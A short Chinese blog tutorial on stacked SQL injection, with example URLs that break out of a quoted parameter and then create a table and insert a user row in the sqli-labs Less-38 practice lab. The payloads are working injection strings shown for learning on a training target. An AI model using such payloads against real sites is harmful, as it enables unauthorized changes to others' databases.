点我

SQL注入【堆叠注入】

原理

在SQL数据库中,每条语句是以;分开的,堆叠注入就是一次性注入并执行多条语句(多语句之间以分号隔开)的注入方式。

局限性

  • 多语句执行受数据库类型、API、数据引擎的限制,有的不能实现。
  • 增删改也收到用户权限的限制。

靶场Less-38

1、单引号构造闭合

http://192.168.168.129/sqli/Less-38/?id=1' -- qwe

image-20250210092417792

2、新建一张数据表

http://192.168.168.129/sqli/Less-38/?id=1'; select * from users;create table user like users; -- qwe

image-20250210092746764

image-20250210092809978

3、新建用户

http://192.168.168.129/sqli/Less-38/?id=1'; insert into users values(20,'mark','mark');-- qwe

image-20250210093028900

image-20250210093045660

分类: WEB安全
版权申明

本文系作者 @小白学安全 原创发布在 xbxaq.com 站点,未经许可,禁止转载!

评论

-- 评论已关闭 --

目录

目录